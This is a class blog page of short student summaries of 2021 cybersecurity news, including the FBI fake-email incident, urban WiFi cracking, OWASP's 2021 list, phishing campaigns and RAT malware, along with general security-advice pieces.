Ethical Hacking

FBI spams thousands with fake infosec advice after ‘software misconfiguration’

November 15, 2021 By Ryan Trapp Leave a Comment

In what is one of the bigger news items of the week, the FBI has had one of their servers compromised and fake emails sent out from it. Since the emails were sent from one of the FBI’s servers they appeared legitimate in nature, as they actually came from their domain. The emails that were sent out were a false warning that the FBI had detected a chain attack and that the company’s virtual servers had been exfiltrated. It also laid blame for the attack at Vinny Troia’s feet, who is the founder of infosec firms Shadow Byte Cyber and Night Lion Security. It does not appear that this is the case. In total about 100,000 of these emails were able to be sent out before the campaign was stopped.

https://www.theregister.com/2021/11/15/fbi_fake_emails/

Attack the block – How a security researcher cracked 70% of urban WiFi networks in one hit

November 11, 2021 By Matthew Bryan 1 Comment

A CyberArk researcher, Ido Hoorvitch, identified that many urban areas have unsafe and weak WiFi passwords that can be easily cracked. Hoorvitch collected 5,000 Wifi hashes around his neighborhood using network sniffing equipment. These were run through CyberArk’s “monster” password cracking rig which used an exploit found in PMKID hashes.

Hoorvitch noted that many people use cell phone numbers as their WiFi password. This allowed him to crack numerous hashes, obtain passwords, and then access their networks. In the cases where a phone number was used, it took approximately nine minutes for each crack. If routers do not support roaming modes, then they are not susceptible to this attack. It is recommended that complex passwords should be used with secure encryption protocols. WAP/WAP1 should be disabled.

Author: Matias Madou
Published: October 20, 2021
Link

The Top 3 Cyber Security Mistakes and How to Avoid Them

November 9, 2021 By Oluwaseun Soyomokun Leave a Comment

Ransomware cost Americans an estimated $1.4 billion last year, and beyond high-profile hacks like the Kaseya and Colonial Pipeline breaches, cyber threats are more common than ever. As a result, businesses of all sizes are scrambling to learn more about cyber security and ensure that they have the proper measures in place to protect their operations. These are the top three considerations organizations must take into account when implementing or upgrading their cyber security approach.

People and Training

First and foremost, there is a significant lack of cybersecurity education among employees. The human firewall is the most important defense, but it is also the most vulnerable. That means security training has to be a top priority when it comes to an organization’s cyber security. Organizations should implement a security awareness training platform which trains, tests and scores all employees. It’s important to teach employees how to identify cyber security threats and remain vigilant toward anything suspicious, such as scams, fraudulent emails, or even physical threats. It’s also important to consider implementing some sort of email gateway filter. With the rise of remote working, additional problems emerge as more people go mobile. For example, it is much easier on mobile to mix company and private mail and people tend to click quickly, which leads to errors. We all need to slow down, verify incoming requests and be cognizant of what we are clicking on so that we do not fall victim to a cyber security threat.

Technology and System

It is also paramount that organizations ensure systems are fully patched, inclusive of their OS, firmware and applications. They must ensure each endpoint detection and response application is installed on each device, with all systems reporting back to a central location or Security Operation Center, where all notifications, events, and alarms can be correlated. A quality Detection and Response application is not only going to defend against malware and other malicious activity, but it will also identify possible insider threats by monitoring lateral traffic. Utilizing such Security SaaS should be part of the overarching security platform which will provide a level of behavioral analytics with the ability to determine what is standard for that user and/or system. Therefore, this allows organizations to identify unusual activity, even if the user has the rights to the systems being accessed.

Additionally, I would suggest V-LANs and least privilege access or even zero trust as a greater security play. For example, IoT devices should not cohabitate on the same V-LAN as the accounting or human resources department. This type of network segmentation allows for greater risk reduction.

Staffing and Security Operations

Many organizations forgo the managed services model to create an in-house security operation center, believing they can do it themselves. There are many cyber security tools available; however, there are very few trained and certified security engineers, and these tools often rely upon alarms, event notifications, or automated messaging to provide alerts. However, this begs the question, who will be monitoring and mitigating the environment at 3 a.m. on New Year’s Eve? Effective cyber security infrastructure requires extensive resources to reduce the total volume of alerts, alarms and events to an actionable notification which requires mitigation. Vacation, training, sick time, education and retention programs are all factors to consider when creating a security operator center. There is a deficit of security analysts, engineers and architects throughout the cyber security space today. Even if you can hire a strong team of cyber security specialists, security operation centers require at least five to six people to ensure 24/7 coverage.

In addition to the personnel issues, there are also equipment, software updates and proper configuration to consider. True quality deployment will require multiple layers, and the systems will have to be integrated, monitored and managed. In comparison, an organization that outsources its cyber security needs can depend upon systems being maintained and a team of experts to support them. Simply put, organizations should secure their environment through a third-party managed security service. These services are inclusive of EDRs, patching systems, a security information event manager, behavioral analytics and east/west traffic monitoring. At best, with the current staffing shortage, an in-house SOC is an ineffective method to detect, quarantine and/or remediate an infected device and/or network.

Hackers are only becoming more sophisticated and, big or small, no organization can afford to go unprotected. Being aware of these three points is critical in protecting your organization from cyber threats. In the current cyber security environment, there is no room for mistakes.

The Top 3 Cyber Security Mistakes and How to Avoid Them – Cyber Defense Magazine

These are the top cybersecurity challenges of 2021

October 26, 2021 by Oluwaseun Soyomokun Leave a Comment

TOP CYBERSECURITY CHALLENGES OF 2021

Corporate leaders are increasingly elevating the importance of cybersecurity to their companies.
But recent high-profile attacks show how much more needs to be done in the year ahead.
Here are the five biggest cybersecurity challenges that must be overcome.

The far-reaching cybersecurity breaches of 2020, culminating in the widespread Solarwinds supply chain attack, were a reminder to decision-makers around the world of the heightened importance of cybersecurity. Cybersecurity is a board-level issue now for many firms.

As per the World Economic Forum’s Global Risks Report 2021, cyber risks continue ranking among global risks. The COVID-19 pandemic has accelerated technological adoption, yet exposed cyber vulnerabilities and unpreparedness, while at the same time exacerbated the tech inequalities within and between societies.

Looking at the year ahead, it is critical to continue elevating cybersecurity as a strategic business issue and develop more partnerships between industries, business leaders, regulators and policymakers. Just like any other strategic societal challenge, cybersecurity cannot be addressed in silos.

Here is a list of five main cybersecurity challenges that global leaders should consider and tackle in 2021.

More complex cybersecurity challenges

Digitalization increasingly impacts all aspects of our lives and industries. We are seeing the rapid adoption of machine learning and artificial intelligence tools, as well as an increasing dependency on software, hardware and cloud infrastructure.

The complexity of digitalization means that governments are fighting different battles — from “fake news” intended to influence elections to cyber-attacks on critical infrastructure. These include the recent wave of ransomware attacks on healthcare systems to the pervasive impact of a compromised provider of widely-adopted network management systems. Vital processes, such as the delivery of the vaccines in the months to come, may also be at risk.

Facing these heightened risks, decision-makers and leaders need to acknowledge that cybersecurity is a national security priority.

The blurring line between digital and physical domains indicates that nations and organizations will only be secure if they incorporate cybersecurity features, principles and frameworks are a necessity for all organizations, especially those with high-value assets. In today’s battles, governments have to adapt to fight against attackers that are silent, distributed, varied and technically savvy. The public and private sectors alike are engaged in this battle – and the private sector will need what only the public sphere can bring to the fight, including policy-making, market-shaping incentive models and training on a large scale.

How business leaders rate risks.

Image: World Economic Forum’s COVID-19 Risks Outlook

2. Fragmented and complex regulations

Cyber adversaries do not stop at countries’ borders, nor do they comply with different jurisdictions. Organizations, meanwhile, must navigate both a growing number and increasingly complex system of regulations and rules, such as the General Data Protection Regulation, the California Consumer Privacy Act, the Cybersecurity Law of the People’s Republic of China and many others worldwide.

Privacy and data protection regulations are necessary, but can also create fragmented, and sometimes conflicting, priorities and costs for companies that can weaken defence mechanisms. Within organisations’ budgetary boundaries, companies have to defend and protect against attacks while they also seek to comply with complex regulations.

Policymakers, thus, need to weigh their decisions with this impact in mind. Individual regulations may have similar intent, but multiple policies add complexity for businesses that need to comply with all regulations, and this complexity introduces its challenges to cybersecurity and data protection, not always improving them. Policies must be creative in increasing protection while decreasing regulatory complexity. Cooperation among different policymakers is critical.

3. Dependence on other parties

Organizations operate in an ecosystem that is likely more extensive and less certain than many may recognize. Connected devices are expected to reach 27 billion by 2021 globally, driven by trends such as the rise of 5G, the internet of things and smart systems. In addition, the boom in remote work that began with the pandemic is expected to continue for many. The concentration of a few technology providers globally provides many entry points for cyber criminals throughout the digital supply chain.

The ecosystem is only as strong as its weakest link. The recent attacks against FireEye and SolarWinds highlight the sensitivity of supply chain issues and dependence on providers of IT functionality and services. Organizations must consider what the breadth of this exposure really means and must take steps to assess the real extent of their entire attack surface and resilience to threats. An inclusive and cross-collaborative process involving teams across different business units is vital to make sure there is an acceptable level of visibility and understanding of digital assets.

4. Lack of cybersecurity expertise

Ransomware is the fastest-growing cybercrime and the COVID-19 pandemic has exacerbated this threat. Preventative measures for ransomware or any other cyber-attack should include preparation: presume you will get hit, back up IT resources and data, make sure there is continuity of operations in disruptions to computer systems, and drill and train the organization in realistic cyber response plans.

Businesses that actively adopt cybersecurity and more importantly improve their cybersecurity infrastructure are more likely to be successful. These businesses have come to see cybersecurity as an enabler to everyday operations. The significance of cybersecurity will likely only increase in the future in order to take advantage of the speed, scale, flexibility, and resilience that digitalization promises. Security by design and by default are becoming integral to success.

Organizational priorities should include a proactive plan for each business to build and maintain its own cybersecurity workforce. With security expertise becoming so difficult to source and retain, organizations should consider cultivating this talent organically. Organizations must also recognize that mobility is implicit in the modern technology workforce. It will be important to plan for the expected tenure of experienced professionals and recognize the long-term benefits that will accrue from a reputation for cultivating this expertise, transmitted from veterans to newcomers entering the field.

5. Difficulty tracking cyber criminals

Being a cyber criminal offers big rewards and few risks since, until recently, the likelihood of detection and prosecution of a cybercriminal was estimated to be as low as 0.05% in the US. This percentage is even lower in many other countries. Even when not obscuring criminal activity through techniques such as dark web tactics, it can be very challenging to prove that a specific actor committed certain acts. Cyber crime is a growing business model, as the increasing sophistication of tools on the darknet makes malicious services more affordable and easily accessible for anyone that is willing to hire a cyber criminal.

Policymakers can help by working with cyber crime experts to establish internationally accepted criteria for attribution, evidence, and cooperation in pursuing cyber criminals and bringing them to justice.

We have learned a lot over the last 18 months, and 2021 will be no different. We need to continue to adapt and take cyber risks seriously by planning, preparing and educating. Since it is a universal issue, open communications between corporations, policymakers, and regulators are a critical key to success. Until security features become integral to technology – seamless, transparent, and naturally usable by people – we will need to rely on business leadership to pay serious attention to cybersecurity.

Link: https://www.weforum.org/agenda/2021/01/top-cybersecurity-challenges-of-2021/

Facebook sues scraper who sold 178 million phone numbers and user IDs

October 25, 2021 by Ryan Trapp 2 Comments

I found this article interesting purely based on the hypocrisy of Facebook being upset at user data being sold. It is alleged that this individual used virtual android devices to perform phone number enumeration scraping. He then assembled a database of user IDs and phone numbers which he put up for sale on a known marketplace for questionably obtained data. Facebook is now suing this person for violation of their terms of service. I guess Facebook is the only one that is allowed to sell their users information.

https://www.theregister.com/2021/10/25/facebook_sues_man_for_scraping/

OWASP’s 2021 List Shuffle: A New Battle Plan and Primary Foe

October 24, 2021 by Matthew Bryan 2 Comments

I thought this was timely given this week’s topic. OWASP recently refreshed their list of web application vulnerabilities which saw Code Injection Vulnerabilities being replaced by Broken Access Control as #1.

The article notes that this shifting in order was not due to “solving” Code Injection Vulnerabilities, but rather it illustrates how widespread Broken Access Control is in the field. Broken Access Control “encompasses a wide range of coding flaws” that could “enable attackers to modify a URL, internal application state, or part of an HTML page.” The category includes any instance where access control policies can be violated so that users can act outside of their intended permissions.

The updated OWASP list also debuted new categories on the list, including Insecure Design, Software & Data Integrity Failure, and Server-Side Request Forgery.

Author: Matias Madou

Published: October 20, 2021

Link

Hackers Stealing Browser Cookies to Hijack High-Profile YouTube Accounts

October 21, 2021 by Shubham Patil 2 Comments

Google said it found no fewer than 15,000 accounts behind the phishing messages and 1,011 domains that were purpose-built to deliver the fraudulent software responsible for executing cookie stealing malware designed to extract passwords and authentication cookies from the victim’s machine and upload them to the actor’s command-and-control servers. The hackers would then use the session cookies to take control of a YouTube creator’s account, effectively circumventing two-factor authentication (2FA), as well as take steps to change passwords and the account’s recovery email and phone numbers.

Link: https://thehackernews.com/2021/10/hackers-stealing-browser-cookies-to.html

How Coinbase Phishers Steal One-Time Passwords

October 21, 2021 by Shubham Patil Leave a Comment

A recent phishing campaign targeting Coinbase users shows thieves are getting smarter about phishing one-time passwords (OTPs) needed to complete the login process. It also shows that phishers are attempting to sign up for new Coinbase accounts by the millions as part of an effort to identify email addresses that are already associated with active accounts.

Link: https://krebsonsecurity.com/2021/10/how-coinbase-phishers-steal-one-time-passwords/#more-57245

Geriatric Microsoft Bug Exploited by APT Using Commodity RATs

October 20, 2021 by Oluwaseun Soyomokun 1 Comment

An Advanced Persistent Threat (APT) described as a “lone wolf” is exploiting a decades-old Microsoft Office flaw to deliver a barrage of commodity Remote Access Trojans (RATs) to organizations in India and Afghanistan, researchers have found.

Attackers use political and government-themed malicious domains as lures in the campaign, which targets mobile devices with out-of-the-box RATs such as dcRAT and QuasarRAT for Windows and AndroidRAT. They’re delivering the RATs in malicious documents by exploiting CVE-2017-11882.

CVE-2017-11882 is a more than 20-year-old memory corruption vulnerability in Microsoft Office that persisted for 17 years before the company patched it in 2017. However, as recently as two years ago, attackers were seen exploiting the bug, which allows them to run malicious code automatically without requiring user interaction.

The advanced persistent threat (APT) behind the campaign also uses a custom file enumerator and infector in the reconnaissance phase of the two-step attack, followed by a second phase added in later versions of the campaign that deploys the ultimate RAT payload, researchers said.

To host the malware payloads, the threat actor registered multiple domains with political and government themes used to fool victims, particularly ones linked to diplomatic and humanitarian efforts in Afghanistan to target entities in that country, researchers said.

“This campaign is a classic example of an individual threat actor employing political, humanitarian and diplomatic themes in a campaign to deliver commodity malware to victims” – in this case, RATs “packed with multiple functionalities to achieve complete control over the victim’s endpoint,”

https://threatpost.com/apt-commodity-rats-microsoft-bug/175601/

Human Psyche is the Victim

October 19, 2021 by Vanessa Marin 1 Comment

Title: How Attackers Hack Humans
Author: Williesha Morris
Publish Date: October 15, 2021
Website: DarkReading.com

We talked about social engineering and how employees are targeted to gather information. Recon 101! Email, phone, text. It’s an interesting perspective article on hacking humans told from the POV of former CIA operative Peter Wamka. He speaks about how tools 20 years in the making are being used now to rely on soft targets to get to hard targets.

Some key points we talked about in class were distinctly pointed out in the article:

insider targets: overworked, underpaid, and underappreciated employees
job postings: can detail all of the systems and databases that a company uses that can be targeted for infiltration
media releases: show how an organization is growing and changing and name potential targets and their job titles or even hobbies and interests.
internet searches: “employee manual” and “PDF” can reveal benefit packages, rules, and other confidential information
social media: work history, certifications, volunteer work, political leanings, relationship statuses, and favorite books and movies.
pictures: demonstrate socioeconomic status

An interesting take on the article is that it provides an interesting alternative option to protecting their employees. Not jus the IT Security mandatory employee training, but taking “protecting your people” to another level.

Offering training or classes with guidance on how to secure their social media profiles.
- “Helping employees use privacy controls and restricted settings is good for their personal safety and can help the organization, as well.”
Show how social media posts can be used against a person.
Training to include what work details shouldn’t be posted socially.

Essentially, the company is protecting itself by virtue of protecting you.

Very good read!

Also, if interested: Peter Wamka has a book out that could prove to be very fun: Confessions of a CIA Spy: The Art of Human Hacking

Vanessa

Missouri Governor Retaliation! OMG!

October 19, 2021 by Vanessa Marin 1 Comment

Title: Missouri Governor Vows to Prosecute St. Louis Post-Dispatch for Reporting Security Vulnerability
Author: Brian Krebs
Published Date: October 14, 2021

So I HAD to find this article. I couldn’t believe my ears when Prof Mackey brought it up. It is the most interesting read. Instead of owning the vulnerability Missouri GOV chooses to blame the reporter for “exploiting” it for publicity. When in reality the reporter found the vulnerability, reported it to the appropriate entity and then held off on publishing the story until the government had the opportunity to remediate the issue. Rather than being thankful, the Governor takes a vindictive stance against the reporter. Key points in this article are the intimidation tactics that the Governor is using. These threats really do hinder future whistleblowers. They prevent good Samaritans from coming forward for fear of being prosecuted.

Attackers Behind Trickbot Expanding Malware Distribution Channels

October 19, 2021 by Ryan Trapp 1 Comment

The bad actors behind the infamous Trickbot malware have resurfaced in an attempt to expand their distribution channels. Their new goal appears to be the deployment of ransomware. The Tickbot malware itself has evolved from a banking Trojan to a modular windows-based crimeware solution. They are moving away from sending out phishing emails with excel documents to a more diversified delivery methods.

https://thehackernews.com/2021/10/attackers-behind-trickbot-expanding.html

Rickroll Grad Prank Exposes Exterity IPTV Bug

October 17, 2021 by Matthew Bryan Leave a Comment

I thought this was a pretty funny, although risky prank, that took advantage of a zero day vulnerability in Exterity’s IPTV system. Minh Duong, a former student at Township High School District 214, identified this vulnerability and was able to take control of every TV within the district. This allowed him to pull off the “Big Rick” which played Rick Astley’s classic “Never Gonna Give You Up” on every IPTV across the district.

The Exterity IPTV system runs networked Projectors and TVs across the Township School District. The TV players can receive serial commands via a web interface and an SSH server which allows for centralized control. Duong noticed this set-up earlier on in highschool and was able to exploit the vulnerability, but didn’t do much with it initially. He later got the idea for the “Big Rick” as a senior prank.

Duong was very clear that he was lucky that the administration didn’t pursue criminal charges against him for unauthorized access. He notes in the article that people should “never access other systems in an unauthorized manner without permission.” The vulnerability has been reported to the manufacturer, although it’s unclear if this has been fixed.

Author: Becky Bracken

Published: October 14, 2021

Link: https://threatpost.com/rickroll-exterity-iptv-bug/175491/

Main Content